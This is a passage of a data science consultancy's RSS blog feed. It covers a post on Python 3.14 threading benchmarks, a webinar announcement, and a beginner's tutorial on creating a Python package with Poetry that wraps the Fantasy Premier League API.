src="busy-processors.png"
alt="Visual demonstration that 16 processors were busy" /&gt;&lt;/p&gt;
&lt;p&gt;But, despite using 16x as many CPUs, the multithreaded version of the
processing script was only about 40% faster. There was only 18 books in
the dataset and some disparity between the book lengths (the bible,
containing millions of words was processed much slower than the others).
Maybe the speed up would be greater with a larger or more balanced
dataset.&lt;/p&gt;
&lt;p&gt;In the post on the WZB Data Science blog, there is a multiprocessing
implementation of the above. Running their multiprocessing code with 16
CPUs gave a similar speed up to multithreading (minimum time 31.2 seconds).
Indeed, if I was writing this code for a real project, multiprocessing would
remain my choice, because the analysis for one book can proceed independently of
that for any other book and data volumes aren&amp;rsquo;t that big.&lt;/p&gt;
&lt;h2 id="other-news"&gt;Other News&lt;/h2&gt;
&lt;p&gt;Python 3.14 has also introduced some improvements to exception-handling, a new approach to
string templating and improvements to the use of concurrent interpreters.
See the
&lt;a href="https://docs.python.org/3.14/whatsnew/3.14.html" rel="external"&gt;Python 3.14 release notes&lt;/a&gt; for further details.&lt;/p&gt;
&lt;p&gt;In the wider Python Data Science ecosystem, a few other developments have occurred or are due
before the end of 2025:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The first stable release of the
&lt;a href="https://posit.co/blog/positron-product-announcement-aug-2025" rel="external"&gt;Positron IDE&lt;/a&gt; was made in August;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://pandas.pydata.org/docs/dev/whatsnew/v3.0.0.html" rel="external"&gt;Pandas 3.0&lt;/a&gt; is due before the end of the
year, and will introduce strings as a data-type, copy-on-write behaviour, and implicit access to
columns in DataFrame-modification code;&lt;/li&gt;
&lt;li&gt;Tools that ingest DataFrames are becoming agnostic to DataFrame library through the Narwahls
project. See the
&lt;a href="https://plotly.com/blog/chart-smarter-not-harder-universal-dataframe-support/" rel="external"&gt;Plotly write-up&lt;/a&gt;
on this subject.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Python data science progresses at such a speed that we can only really scratch the surface here.
Have we missed anything in the wider Python ecosystem (2025 edition) that will make a huge
difference to your data work? Let us know on
&lt;a href="https://www.linkedin.com/company/jumping-rivers-ltd" rel="external"&gt;LinkedIn&lt;/a&gt; or
&lt;a href="https://bsky.app/profile/jumpingrivers.com" rel="external"&gt;Bluesky&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/whats-new-py314/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Upcoming Free Webinar: Understanding Posit - Ecosystem and Use Cases</title><link>https://www.jumpingrivers.com/blog/jumping-rivers-webinar-posit/</link><pubDate>Mon, 13 Oct 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/jumping-rivers-webinar-posit/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/jumping-rivers-webinar-posit/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/jumping-rivers-webinar-posit/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Date:&lt;/strong&gt; Thursday, 23rd October 2025&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Time:&lt;/strong&gt; 13:05 (UK Time)&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Duration:&lt;/strong&gt; 55 minutes&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Cost:&lt;/strong&gt; Absolutely free!&lt;/p&gt;
&lt;p&gt;Reserve your spot now: &lt;a href=""&gt;https://jumpingrivers.typeform.com/to/UmdyNbAs&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Ready to get more out of your Posit tools and understand how they can drive value
across your organisation? Join us for this month’s free Jumping Rivers webinar,
“Understanding Posit: Ecosystem and Use Cases.”
In this live session, our experts will take you beyond the basics -
exploring how Posit’s ecosystem (including Connect, Workbench, and Package Manager)
supports scalable, secure, and collaborative data workflows. Whether you’re managing
analytical environments, deploying Shiny apps, or looking to integrate R and Python
workflows across teams, this session will show you how to make the most of your Posit investment.&lt;/p&gt;
&lt;p&gt;What you’ll gain:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;A clear understanding of how the Posit ecosystem fits into modern data infrastructure&lt;/li&gt;
&lt;li&gt;Guidance for managing and scaling data science environments&lt;/li&gt;
&lt;li&gt;A chance to ask questions directly to our experts&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Exclusive attendee perks:
Attend &lt;strong&gt;two or more webinars&lt;/strong&gt; and receive &lt;strong&gt;a 30% discount&lt;/strong&gt; for our AI in Production
Conference (June 2026) — where data scientists, engineers, and innovators meet to
share ideas, network, and explore the future of AI.
👉 &lt;a href="https://www.eventbrite.co.uk/e/ai-in-production-registration-1777831163869?aff=ebdssbcategorybrowse" rel="external"&gt;Register for the conference here&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/jumping-rivers-webinar-posit/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Creating a Python Package with Poetry for Beginners</title><link>https://www.jumpingrivers.com/blog/python-package/</link><pubDate>Thu, 09 Oct 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/python-package/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/python-package/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/python-package/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h2 id="intro"&gt;Intro&lt;/h2&gt;
&lt;p&gt;In this blog series (this and the next blog) I am going to demonstrate how to use
&lt;a href="https://python-poetry.org/" rel="external"&gt;Poetry&lt;/a&gt; to create a Python package, set up testing infrastructure
and install it. I am going to be creating a wrapper around the Fantasy Premier League API
and creating a function which can create a weekly league table.&lt;/p&gt;
&lt;p&gt;Before we look at creating a package, why might we want one? There is a multitude of reasons for
wrapping your code up but to me the main three are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Code wrapped up in a package is &lt;strong&gt;reusable&lt;/strong&gt;, meaning we just need to install the package
to use the exported functions instead of copy-and-pasting or reimplementing the same code in your projects.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;The code is very easy to &lt;strong&gt;share&lt;/strong&gt; once wrapped up in a package. Just publish to a package index
or share the repository privately and other people will be able to use it.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Maintenance&lt;/strong&gt; of a package is also very easy with all the development tools available.
Centralisation of bug fixes, updates, documentation, testing and more will make your life a
whole lot easier.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We will come back to the value of distributing a package later in the blog series. When a publishable package is ready,
it can be published in the &lt;a href="https://pypi.org/" rel="external"&gt;Python Package Index (PyPI)&lt;/a&gt; and from here
it can be installed by other users.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-python-package"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="set-up"&gt;Set Up&lt;/h2&gt;
&lt;p&gt;The first thing you&amp;rsquo;ll need to do is come up with a name for your package (often the hardest bit)
and then we will use Poetry to create the initial infrastructure. Note that other packaging and
dependency management tools are available like &lt;a href="https://pypi.org/project/setuptools/" rel="external"&gt;Setuptools&lt;/a&gt;,
&lt;a href="https://pypi.org/project/flit/" rel="external"&gt;Flit&lt;/a&gt; or &lt;a href="https://pypi.org/project/hatch/" rel="external"&gt;Hatch&lt;/a&gt;.
As I said though in this blog we are focusing on Poetry so once we have a name for the
package (my package for this blog is called &lt;code&gt;fpl-league&lt;/code&gt;) we can run:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;poetry new fpl-league
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;This will create a directory called &lt;code&gt;fpl-league&lt;/code&gt; with the structure:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;fpl-league
├── poetry.lock
├── pyproject.toml
├── README.md
├── src
│   └── fpl_league
│   ├── get_league.py
│   └── __init__.py
└── tests
└── __init__.py
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;The purpose of these files is as follows:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;pyproject.toml&lt;/code&gt; - A kinda config file for your package, contains information
like name, version, author, license and any dependencies or build tools used.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;README.md&lt;/code&gt; - Not python specific, just a file containing an overview
of how to use / install the package and any other relevant information.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;src/&lt;/code&gt; - This directory will contain any of the actual source (src) code
of your package.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;tests/&lt;/code&gt; - Contains any code or data used for testing your package.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;__init__.py&lt;/code&gt; - This file marks the presence of python code and is used to control
what gets exported from your package. You&amp;rsquo;ll notice there is one of these in &lt;code&gt;tests/&lt;/code&gt;
and &lt;code&gt;src/&lt;/code&gt;, the use is similar in each but in &lt;code&gt;tests/&lt;/code&gt; it makes code importable
for testing and in &lt;code&gt;src/&lt;/code&gt; it makes code importable for users of the package.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Note: Testing will be covered briefly in the next blog and we also have some other blogs on the
subject like &lt;a href="https://www.jumpingrivers.com/blog/intro-to-pytest/" rel="external"&gt;&amp;lsquo;First Steps in Python Testing&amp;rsquo;&lt;/a&gt;
and &lt;a href="https://www.jumpingrivers.com/blog/python-testing-advanced/" rel="external"&gt;&amp;lsquo;Advanced Testing in Python&amp;rsquo;.&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Okay we&amp;rsquo;ve now got the skeleton of our package! Here is where we start fleshing things out. I
know that for my package I&amp;rsquo;m going to be querying an API with the &lt;a href="https://pypi.org/project/requests/" rel="external"&gt;requests&lt;/a&gt;
package. That means &lt;code&gt;requests&lt;/code&gt; should be a dependency of my package, and that anybody who wants to use my
package will also need requests installed.&lt;/p&gt;
&lt;p&gt;To add &lt;code&gt;requests&lt;/code&gt; as a dependency of my package we are again going to turn to Poetry and run &lt;code&gt;poetry add&lt;/code&gt; whilst at the
root level of the package:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;poetry add requests
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;This will update our &lt;code&gt;pyproject.toml&lt;/code&gt; to include requests as a dependency and create a new file called
&lt;code&gt;poetry.lock&lt;/code&gt; which contains all dependencies and sub-dependencies of our package with exact versions.
The &lt;code&gt;poetry.lock&lt;/code&gt; file is helpful for ensuring the code will work on any machine whilst developing the package.
Here is what the toml file will look like after adding requests:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;[project]
name = &amp;#34;fpl-league&amp;#34;
version = &amp;#34;0.1.0&amp;#34;
description = &amp;#34;&amp;#34;
authors = [
{name = &amp;#34;osheen1&amp;#34;,email = &amp;#34;osheen@jumpingrivers.com&amp;#34;}
]
readme = &amp;#34;README.md&amp;#34;
requires-python = &amp;#34;&amp;gt;=3.10&amp;#34;
dependencies = [
&amp;#34;requests (&amp;gt;=2.32.5,&amp;lt;3.0.0)&amp;#34;
]
[tool.poetry]
packages = [{include = &amp;#34;fpl_league&amp;#34;, from = &amp;#34;src&amp;#34;}]
[build-system]
requires = [&amp;#34;poetry-core&amp;gt;=2.0.0,&amp;lt;3.0.0&amp;#34;]
build-backend = &amp;#34;poetry.core.masonry.api&amp;#34;
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;The change made here is the dependencies field has been updated to include &lt;code&gt;requests&lt;/code&gt;.&lt;/p&gt;
&lt;h2 id="python-environments"&gt;Python Environments&lt;/h2&gt;
&lt;p&gt;Python Environments could be a blog post by itself so I will only cover the background briefly and
why it&amp;rsquo;s important for package development. If you want to learn more about what they are,
check out &lt;a href="https://www.jumpingrivers.com/blog/python-virtual-environments-conda-poetry/" rel="external"&gt;this Jumping Rivers blog&lt;/a&gt; comparing Python Environments and Barbie
is helpful and if you want to know if you should be using one,
&lt;a href="https://stackoverflow.com/questions/72835581/explain-why-python-virtual-environments-are-better" rel="external"&gt;this StackOverflow question&lt;/a&gt;
should tell you.&lt;/p&gt;
&lt;p&gt;A Python Environment or virtual environment (venv) is similar to any kind of environment in the data science world: it is a
box where you have exactly what you need installed for the specific project it&amp;rsquo;s associated with. During package development using a venv ensures the reproducibility of the development environment across a team, as all developers will be using the
same package versions. Like with everything in Python there are multiple packages and ways to set up a
venv like
&lt;a href="https://docs.python.org/3/library/venv.html" rel="external"&gt;venv&lt;/a&gt; or
&lt;a href="https://pipenv.pypa.io/en/latest/" rel="external"&gt;pipenv&lt;/a&gt;, but for this blog we are sticking with Poetry.&lt;/p&gt;
&lt;p&gt;To use a virtual environment while developing your package:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;poetry install
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;This will ensure all package dependencies are installed.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;poetry env activate
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;This will give you a command to activate the venv, a source call to the path
of the activation file for the venv. Alternatively you can run this which will
also evaluate the command returned:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;eval $(poetry env activate )
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Once you have activated the venv your terminal will display the name of that environment
in brackets like this:&lt;/p&gt;
&lt;p&gt;&lt;img alt="" height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/python-package/venv.png" width="381"&gt;&lt;/p&gt;
&lt;p&gt;We can test the venv by ensuring the packages installed are the same as the &lt;code&gt;poetry.lock&lt;/code&gt;
file by entering a Python session and looking at package versions vs system versions.
As I have only installed requests at this point:&lt;/p&gt;
&lt;p&gt;&lt;img alt="" height="auto" id="h-rh-i-1" src="https://www.jumpingrivers.com/blog/python-package/requests_version.png" width="780"&gt;&lt;/p&gt;
&lt;p&gt;See when I enter the venv I am using the package dependency of &amp;ldquo;requests (&amp;gt;=2.32.5,&amp;lt;3.0.0)&amp;rdquo;
which is defined in the &lt;code&gt;pyproject.toml&lt;/code&gt; and &lt;code&gt;poetry.lock&lt;/code&gt; files rather than my system version
which is &amp;ldquo;2.31.0&amp;rdquo;.&lt;/p&gt;
&lt;p&gt;Then to exit the venv you can use:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;deactivate
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id="adding-a-function--intro-to-fpl"&gt;Adding a Function (&amp;amp; Intro to FPL)&lt;/h2&gt;
&lt;p&gt;Now we&amp;rsquo;ve learnt a bit about developing a Python package, the next thing to do is add the one and
only function I&amp;rsquo;ll be putting in this package. The function I&amp;rsquo;m adding will be a wrapper around the Fantasy Premier
League API. If you don&amp;rsquo;t already know fantasy premier league (FPL) is an online game where you and
other players pick real life footballers in a team and you score points based on actions in the real life
games, more information can be found on the &lt;a href="https://fantasy.premierleague.com/" rel="external"&gt;website&lt;/a&gt;. There are multiple
endpoints available for accessing things like player data and fixture difficulty (great summary of the API &lt;a href="https://www.oliverlooney.com/blogs/FPL-APIs-Explained" rel="external"&gt;here&lt;/a&gt;),
in fact there is an existing Python package which uses them, check that out &lt;a href="https://fpl.readthedocs.io/en/latest/" rel="external"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;I am focusing on something that is not covered by the other packages (as far as I&amp;rsquo;m aware) and that&amp;rsquo;s the
league data. There is an endpoint for accessing the league table if you know your unique league ID:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;https://fantasy.premierleague.com/api/leagues-classic/league_id/standings/
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;However, I want a summary of the league across the season so I can see progression throughout. This data
could then be used to create some season summaries. Conveniently, at the time of writing I am at the top of
the league I&amp;rsquo;ve entered with my friends, so I will appear at the top of the dataset my that function will return.&lt;/p&gt;
&lt;p&gt;To actually add my function I&amp;rsquo;ll create a file in &lt;code&gt;src/fpl-league&lt;/code&gt; called &lt;code&gt;get_league.py&lt;/code&gt; and in here I&amp;rsquo;ll define my function
along with any packages I&amp;rsquo;ll need to run it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;requests&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pandas&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pd&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;json&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_season_league&lt;/span&gt;(league_id &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;485842&amp;#34;&lt;/span&gt;):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; api_url &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;https://fantasy.premierleague.com/api/&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; url &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; api_url&lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;leagues-classic/&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; league_id &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;/standings/&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; response &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;get(url)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; json&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;loads(response&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;text)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; league &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;DataFrame(data[&lt;span style="color:#a5d6ff"&gt;&amp;#39;standings&amp;#39;&lt;/span&gt;][&lt;span style="color:#a5d6ff"&gt;&amp;#39;results&amp;#39;&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;DataFrame([])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; index, row &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; league&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;iterrows():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; player_query &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; api_url &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;entry/&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; str(row[&lt;span style="color:#a5d6ff"&gt;&amp;#39;entry&amp;#39;&lt;/span&gt;]) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;/history&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; player_response &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;get(player_query)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; player_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; json&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;loads(player_response&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;text)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; player_df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;DataFrame({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;name&amp;#39;&lt;/span&gt;: row[&lt;span style="color:#a5d6ff"&gt;&amp;#39;player_name&amp;#39;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;team_name&amp;#39;&lt;/span&gt;: row[&lt;span style="color:#a5d6ff"&gt;&amp;#39;entry_name&amp;#39;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;event&amp;#39;&lt;/span&gt;: pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;json_normalize(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; player_data[&lt;span style="color:#a5d6ff"&gt;&amp;#39;current&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )[&lt;span style="color:#a5d6ff"&gt;&amp;#39;event&amp;#39;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;points&amp;#39;&lt;/span&gt;: pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;json_normalize(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; player_data[&lt;span style="color:#a5d6ff"&gt;&amp;#39;current&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )[&lt;span style="color:#a5d6ff"&gt;&amp;#39;total_points&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;concat([df, player_df])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; df
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Without going into too much detail on the code, I am querying the API to get the current standing of the
league, then mapping over each player and grabbing their weekly scores. The final output should have
5 rows (as there has only been 5 gameweeks so far) and look like this:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th style="text-align: left"&gt;name&lt;/th&gt;
&lt;th style="text-align: left"&gt;team_name&lt;/th&gt;
&lt;th style="text-align: right"&gt;event&lt;/th&gt;
&lt;th style="text-align: right"&gt;points&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;Osheen Macoscar&lt;/td&gt;
&lt;td style="text-align: left"&gt;What’s the Mata?&lt;/td&gt;
&lt;td style="text-align: right"&gt;1&lt;/td&gt;
&lt;td style="text-align: right"&gt;69&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;Osheen Macoscar&lt;/td&gt;
&lt;td style="text-align: left"&gt;What’s the Mata?&lt;/td&gt;
&lt;td style="text-align: right"&gt;2&lt;/td&gt;
&lt;td style="text-align: right"&gt;137&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;Osheen Macoscar&lt;/td&gt;
&lt;td style="text-align: left"&gt;What’s the Mata?&lt;/td&gt;
&lt;td style="text-align: right"&gt;3&lt;/td&gt;
&lt;td style="text-align: right"&gt;202&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;Osheen Macoscar&lt;/td&gt;
&lt;td style="text-align: left"&gt;What’s the Mata?&lt;/td&gt;
&lt;td style="text-align: right"&gt;4&lt;/td&gt;
&lt;td style="text-align: right"&gt;284&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;Osheen Macoscar&lt;/td&gt;
&lt;td style="text-align: left"&gt;What’s the Mata?&lt;/td&gt;
&lt;td style="text-align: right"&gt;5&lt;/td&gt;
&lt;td style="text-align: right"&gt;337&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="using-the-function"&gt;Using the Function&lt;/h2&gt;
&lt;p&gt;Now we&amp;rsquo;ve defined our function in the package, to use it we must enter the virtual environment and
import our function from the module:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;fpl_league.get_league&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; get_season_league
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We can also edit the &lt;code&gt;__init__.py&lt;/code&gt; so we don&amp;rsquo;t need to explicitly load the function from the &lt;code&gt;get_league&lt;/code&gt; module. So if we
add the above code to the &lt;code&gt;__init__.py&lt;/code&gt; file then all we need to do to load the function is:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;fpl_league&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; get_season_league
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This makes it easier for users as they won&amp;rsquo;t have to remember the module name and have to type a little bit less.&lt;/p&gt;
&lt;h1 id="next-up"&gt;Next Up&lt;/h1&gt;
&lt;p&gt;So far we&amp;rsquo;ve covered creating our package with Poetry, managing our development environment and adding a function.
In the next blog post we&amp;rsquo;ll be covering the next steps with package development including documentation,
testing and publishing to PyPI.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/python-package/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Testing with {testthat}</title><link>https://www.jumpingrivers.com/blog/r-testthat/</link><pubDate>Thu, 25 Sep 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-testthat/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-testthat/"&gt;
